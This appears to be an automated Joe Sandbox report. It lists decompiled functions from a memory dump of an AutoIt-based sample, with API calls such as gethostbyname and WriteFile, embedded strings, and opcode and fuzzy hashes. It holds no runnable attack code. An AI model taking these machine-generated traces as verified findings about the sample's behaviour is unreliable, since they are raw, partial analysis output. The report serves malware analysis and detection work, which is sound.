                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1378193009-0
                                                                                                                                                                              • Opcode ID: 593db0c0584b9d49581b67dc4010a437d9d3999fbbd0e155c6b90b4b28bdf859
                                                                                                                                                                              • Instruction ID: 3d4e40ada0942db235cd9340ca5eb503fc4b29830d795f99ef7f386a8186c368
                                                                                                                                                                              • Opcode Fuzzy Hash: 593db0c0584b9d49581b67dc4010a437d9d3999fbbd0e155c6b90b4b28bdf859
                                                                                                                                                                              • Instruction Fuzzy Hash: EC212C71504794AFE7328B249855FE7BFFCAF12308F04008EE69E57291C3745984DB65
                                                                                                                                                                              Function 005092C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004FAEA5,?,?,00000000,00000008), ref: 004CF282
                                                                                                                                                                                • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004FAEA5,?,?,00000000,00000008), ref: 004CF2A6
                                                                                                                                                                              • gethostbyname.WS2_32(?,?,?), ref: 005092F0
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 005092FB
                                                                                                                                                                              • _memmove.LIBCMT ref: 00509328
                                                                                                                                                                              • inet_ntoa.WSOCK32(?), ref: 00509333
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1504782959-0
                                                                                                                                                                              • Opcode ID: c355d5f013628fe56d59ac440d772deceb411990a0ec37b2de1f76b0311cb99f
                                                                                                                                                                              • Instruction ID: a59faece4f5e605a2753875de6a7cf022c40db674eefb57e5f80f694b7129681
                                                                                                                                                                              • Opcode Fuzzy Hash: c355d5f013628fe56d59ac440d772deceb411990a0ec37b2de1f76b0311cb99f
                                                                                                                                                                              • Instruction Fuzzy Hash: E8118E36500109AFCB04FBA1CD46DEEBBB9FF14318710406AF506A72A2DB34AE04DB65
                                                                                                                                                                              Function 004B3BFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 00523CF1
                                                                                                                                                                              • GetOpenFileNameW.COMDLG32(?,?,00000001,005722E8), ref: 00523D35
                                                                                                                                                                                • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                                                                                                                                                • Part of subcall function 004B3A67: SHGetMalloc.SHELL32(1<K), ref: 004B3A7D
                                                                                                                                                                                • Part of subcall function 004B3A67: SHGetDesktopFolder.SHELL32(?), ref: 004B3A8F
                                                                                                                                                                                • Part of subcall function 004B3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 004B3AD2
                                                                                                                                                                                • Part of subcall function 004B3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,005722E8,?), ref: 004B3B65
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                                                                              • String ID: X
                                                                                                                                                                              • API String ID: 3714316930-3081909835
                                                                                                                                                                              • Opcode ID: a130fc09c2c33ba1362b68abf8f54471231f0fe68e984bba5f03e0b694268ef7
                                                                                                                                                                              • Instruction ID: c4b907415022ace992e445d317f9ec2da2c21512a22b7f9c0c5729a8a6e2568a
                                                                                                                                                                              • Opcode Fuzzy Hash: a130fc09c2c33ba1362b68abf8f54471231f0fe68e984bba5f03e0b694268ef7
                                                                                                                                                                              • Instruction Fuzzy Hash: C211A7B1A00298ABCF05DFDAD8056DEBFF9AF45705F00400EE501BB341DBB85A49CBA5
                                                                                                                                                                              Function 004BC610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,004BC00E,?,?,?,?,00000010), ref: 004BC627
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 004BC65F
                                                                                                                                                                              • _memmove.LIBCMT ref: 004BC697
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3033907384-0
                                                                                                                                                                              • Opcode ID: 78044906504a3504c9ac2469000a3095eb816bf81bd79329b596f40c17b10c44
                                                                                                                                                                              • Instruction ID: 22a0e49bf3c692a3e0c40db32d7a40358bd6dbc4a118291bb908bb685628feb7
                                                                                                                                                                              • Opcode Fuzzy Hash: 78044906504a3504c9ac2469000a3095eb816bf81bd79329b596f40c17b10c44
                                                                                                                                                                              • Instruction Fuzzy Hash: 3331F7B2200201ABDB249B35D896F9BB7D9EF44310F10453FF85AC7390EA36E910C765
                                                                                                                                                                              Function 004D45EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __FF_MSGBANNER.LIBCMT ref: 004D4603
                                                                                                                                                                                • Part of subcall function 004D8E52: __NMSG_WRITE.LIBCMT ref: 004D8E79
                                                                                                                                                                                • Part of subcall function 004D8E52: __NMSG_WRITE.LIBCMT ref: 004D8E83
                                                                                                                                                                              • __NMSG_WRITE.LIBCMT ref: 004D460A
                                                                                                                                                                                • Part of subcall function 004D8EB2: GetModuleFileNameW.KERNEL32(00000000,00570312,00000104,?,00000001,004D0127), ref: 004D8F44
                                                                                                                                                                                • Part of subcall function 004D8EB2: ___crtMessageBoxW.LIBCMT ref: 004D8FF2
                                                                                                                                                                                • Part of subcall function 004D1D65: ___crtCorExitProcess.LIBCMT ref: 004D1D6B
                                                                                                                                                                                • Part of subcall function 004D1D65: ExitProcess.KERNEL32 ref: 004D1D74
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,?,?,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D462F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1372826849-0
                                                                                                                                                                              • Opcode ID: cac3d884f0db0bd9fb4d2821f95877a90ace383c2de56cdaaa761cf3a5c2f032
                                                                                                                                                                              • Instruction ID: d745a5dc002420c60ff91655b854b5b3a8d8da1a8f5f566eab20e5d9f9c691f5
                                                                                                                                                                              • Opcode Fuzzy Hash: cac3d884f0db0bd9fb4d2821f95877a90ace383c2de56cdaaa761cf3a5c2f032
                                                                                                                                                                              • Instruction Fuzzy Hash: 5001A131601201ABE6213B25AC71A2A7358ABD3B65F11002FF606973C1DEBCDC40966D
                                                                                                                                                                              Function 004BE60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 004BE646
                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 004BE651
                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE664
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4217535847-0
                                                                                                                                                                              • Opcode ID: f75f9967de2e64d43f9a0f433d92cc143ed2c0ace83273e8e8c70dd02ad7e0fa
                                                                                                                                                                              • Instruction ID: 5bf689c263bd7a53104595fbe800045b1c36bbf321e1aa8deff2b1be555e98b4
                                                                                                                                                                              • Opcode Fuzzy Hash: f75f9967de2e64d43f9a0f433d92cc143ed2c0ace83273e8e8c70dd02ad7e0fa
                                                                                                                                                                              • Instruction Fuzzy Hash: 14F05E3260434997DB10D6E69C46FEBB7EDBF94740F54082EB645C2180E7B8D4049726
                                                                                                                                                                              Function 004FC450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _free.LIBCMT ref: 004FC45E
                                                                                                                                                                                • Part of subcall function 004D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28DE
                                                                                                                                                                                • Part of subcall function 004D28CA: GetLastError.KERNEL32(00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28F0
                                                                                                                                                                              • _free.LIBCMT ref: 004FC46F
                                                                                                                                                                              • _free.LIBCMT ref: 004FC481
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                              • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                                                              • Instruction ID: f022a94627a0574eabaaa930a509d208650d51a10b4d1ef6fb59618d6dde1429
                                                                                                                                                                              • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                                                              • Instruction Fuzzy Hash: 84E0C2A160070482CA20B97A6AA0BB353CC2F04310B04096FF549D3382CF5CE840A03C
                                                                                                                                                                              Function 004C058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: CALL
                                                                                                                                                                              • API String ID: 0-4196123274
                                                                                                                                                                              • Opcode ID: 0026fa494153c77eb388212de051a657db6aed34ac60258221560b57b967a371
                                                                                                                                                                              • Instruction ID: 979289cf3b294ef4ec807552f4fdf7a3a2dd4c17ee7bdf5ea50e98a7580ed943
                                                                                                                                                                              • Opcode Fuzzy Hash: 0026fa494153c77eb388212de051a657db6aed34ac60258221560b57b967a371
                                                                                                                                                                              • Instruction Fuzzy Hash: 9C229C78608341CFD764DF15C490F2ABBE1BF85304F14896EE89A8B362D739E885CB46
                                                                                                                                                                              Function 004B131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B16F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004B14EB), ref: 004B1751
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004B159B
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 004B1612
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 005258F7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3815369404-0
                                                                                                                                                                              • Opcode ID: 390963825129f3a324b003f28e359cdb4fde1595a4aef9a82e9febe77a3e86ae
                                                                                                                                                                              • Instruction ID: 4171bfb248d227c5a931d4a50c54fa6632f26a655904c68062bbefce34b9e5a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 390963825129f3a324b003f28e359cdb4fde1595a4aef9a82e9febe77a3e86ae
                                                                                                                                                                              • Instruction Fuzzy Hash: 2071EDB4811A408BCB18DF6EB996494BBEAF768348794416ED40E87362DB74448CFF2D
                                                                                                                                                                              Function 004B4010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID: EA06
                                                                                                                                                                              • API String ID: 4104443479-3962188686
                                                                                                                                                                              • Opcode ID: 5e9adad7c6e9f90e06c1c85b1d727b1d714ad421438514e47ea7af884c08d50a
                                                                                                                                                                              • Instruction ID: 9b6afbe66828c7d41ce9c01d634270eae67b314b1cb82fb27023465c481a9f98
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e9adad7c6e9f90e06c1c85b1d727b1d714ad421438514e47ea7af884c08d50a
                                                                                                                                                                              • Instruction Fuzzy Hash: 23419E21E0411497DB11AB6888957FF7F62DFD5304F18456BEA82DB283C6398DC187BA
                                                                                                                                                                              Function 0050013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscmp
                                                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                                                              • API String ID: 856254489-3771769585
                                                                                                                                                                              • Opcode ID: 150c986f50d1a6c943ff15e37fbfd822fddfde7b0a686d130a8cc75144286113
                                                                                                                                                                              • Instruction ID: e5fa12a1462eb7a86ac406a9d3aaaba68ddb0a18c0427d3321cbf45b82cd1ca6
                                                                                                                                                                              • Opcode Fuzzy Hash: 150c986f50d1a6c943ff15e37fbfd822fddfde7b0a686d130a8cc75144286113
                                                                                                                                                                              • Instruction Fuzzy Hash: BC118F35600204DBCB04EB55C9D1EADB7A9BF88718F14805EF605AF3D1DA74EE42CBA4
                                                                                                                                                                              Function 004F30AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID: "W
                                                                                                                                                                              • API String ID: 4104443479-3062634219
                                                                                                                                                                              • Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                                                                              • Instruction ID: 3eedd2f3568363316124f9c40c3bba42633d0a6b269ab2ce3b554b057822d21e
                                                                                                                                                                              • Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                                                                              • Instruction Fuzzy Hash: 0301D136200225ABCB249F2EC8919BB77A9EFC5318714802FF90ACB305D636E906C790
                                                                                                                                                                              Function 004B34C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 005234AA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                              • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                                              • API String ID: 1029625771-2684727018
                                                                                                                                                                              • Opcode ID: 83f74ad1907b0dfa9fb2908eb6a6513ff133d6cbd60fc3d8d71e62c0562c2c61
                                                                                                                                                                              • Instruction ID: c8a99aaa030bf87cb2cdeed0fa13ac3d7e6bcf0d2416237564fcb90232405ac9
                                                                                                                                                                              • Opcode Fuzzy Hash: 83f74ad1907b0dfa9fb2908eb6a6513ff133d6cbd60fc3d8d71e62c0562c2c61
                                                                                                                                                                              • Instruction Fuzzy Hash: 8FF0447190021DAA9F11FEA2D9918FFB778BE10308B10856BE81592181EB38DB09DB75
                                                                                                                                                                              Function 004F6852 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004F6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,004F685E,?,?,?,00524A5C,0054E448,00000003,?,?), ref: 004F66E2
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,"W,00000000,00000000,?,?,?,00524A5C,0054E448,00000003,?,?,004B4C44,?,?), ref: 004F686C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$PointerWrite
                                                                                                                                                                              • String ID: "W
